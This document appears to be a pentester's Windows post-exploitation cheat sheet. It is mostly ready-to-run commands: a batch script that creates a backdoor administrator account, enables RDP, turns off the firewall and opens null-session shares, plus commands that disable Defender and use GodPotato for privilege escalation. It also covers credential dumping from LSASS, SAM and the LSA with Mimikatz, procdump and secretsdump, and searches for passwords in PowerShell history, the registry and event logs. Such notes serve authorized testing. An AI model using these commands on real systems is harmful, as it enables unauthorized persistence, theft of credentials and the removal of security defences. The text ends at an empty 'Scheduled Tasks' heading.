Weaken the system

TIP
If you have localadmin or system on the target machine, you likely have the ability to weaken the system.
- Open ports, Enable RDP, Enable file shares etc.
This may make things easier moving forward.
You need command execution as admin/system to perform some of the listed commands/scripts.

weaken.bat:
  add localadmin user
    net user aslam Password123! /add
    net localgroup Administrators aslam /add
  enable rdp
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
  disable firewall
    netsh advfirewall set allprofiles state off
  enable shares
    netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
    netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v restrictnullsessaccess /t REG_DWORD /d 0 /f
    net stop LanmanServer
    net start LanmanServer

example:
  on a shell as localadmin:
    .\weaken.bat
  on a system with SeImpersonatePrivilege:
    .\GodPotato-NET4.exe -cmd "cmd /c C:\Users\Public\share\weak.bat"

xfreerdp allows you to sign in using hashes and domain accounts:
  xfreerdp /v:ms01 /u:backdoor /p:Password123! +clipboard /cert:ignore
  this may tell you another user is signed in, do you want to sign in anyway? select yes
alternatively, you can use rdesktop:
  rdesktop ms01

Shares via gui:
  Enable Network Sharing:
  1. Manage Advanced sharing settings
  2. Turn on sharing
  Create Share:
  1. Right click -> properties
  2. Sharing
  3. Share
  4. Everyone : R,W

powershell exec:
  Set-ExecutionPolicy Unrestricted
  disable defender
    Set-MpPreference -DisableRealTimeMonitoring $True

Creds in memory

Mimikatz:
  Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
  Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
  Invoke-Mimikatz -Command '"vault::cred /patch"'
  Get-Process -Name LSASS
  .\procdump.exe -ma <ProcNum> lsass.dmp
  lsassy -u <USER> -H <NTLM> -d <domain.full> $ip --users
  .\winPEASx64 windowscreds

(SAM) creds:
  Mimikatz:
    Invoke-Mimikatz -Command '"lsadump::sam"'
  secretsdump:
    reg save HKLM\sam sam
    reg save HKLM\system system
    impacket-secretsdump -sam sam -system system LOCAL

Cached credentials:
  Mimikatz:
    lsadump::lsa /inject
  secretsdump:
    reg save HKLM\security security
    impacket-secretsdump -sam sam -security security -system system LOCAL

File system enum

TIP
Repeat the steps for all users on the system

manual:
  Enumerate drives
    dir C:\
  users' home
    tree C:\Users /f
auto/winpeas:
  .\winPEASx64.exe fileanalysis
  .\winPEASx64.exe filesinfo

Filesystem breadcrumbs:
  win.old/backup FS
    Get-ChildItem -Path C:\windows.old -Include *SAM,*SYSTEM,*SECURITY,*.kdbx,*doc,*xml,*config -File -Recurse -ErrorAction SilentlyContinue
  interesting files
    Get-ChildItem -Path C:\ -Include *.kdbx,*.pdf,*.txt,*.doc,*.docx,*.xml -File -Recurse -ErrorAction SilentlyContinue
  "password" in file
    findstr /si password *.xml *.ini *.txt
  PS history
    cat (Get-PSReadlineOption).HistorySavePath
    cat (Get-PSReadlineOption).HistorySavePath | sls passw
    type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
    type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
    type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    as a localadmin, you can loop through all users' PS history. This bat script automates the process.
    PSHistory.bat:
      @echo off
      setlocal
      :: Loop through each folder in C:\Users
      for /D %%u in (C:\Users\*) do (
          set "userfolder=%%~nxu"

          :: Check if the PSReadline history file exists for this user
          if exist "%%u\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" (
              echo User: %%~nxu
              echo ------------------------------
              type "%%u\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt"
              echo.
          )
      )
      endlocal
  PS transcript
    reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
    reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
    reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
    reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
  Console history

Registry keys

pwd search:
  reg query HKLM /f password /t REG_SZ /s
  reg query HKCU /f password /t REG_SZ /s
putty creds:
  reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername"
ssh keys:
  reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'
other reg:
  reg query "HKCU\Software\ORL\WinVNC3\Password"
  reg query "HKCU\Software\TightVNC\Server"
  reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s

Event logs

gui:
  win+r -> eventvwr.msc
  Event ID: 4624
  Event ID: 4672
  Event ID: 4674
PS:
  Get-WinEvent -FilterHashtable @{LogName='*'} | Where-Object { $_.Message -match 'password' }

Environment

PS:
  dir env:
cmd:
  set

Scheduled Tasks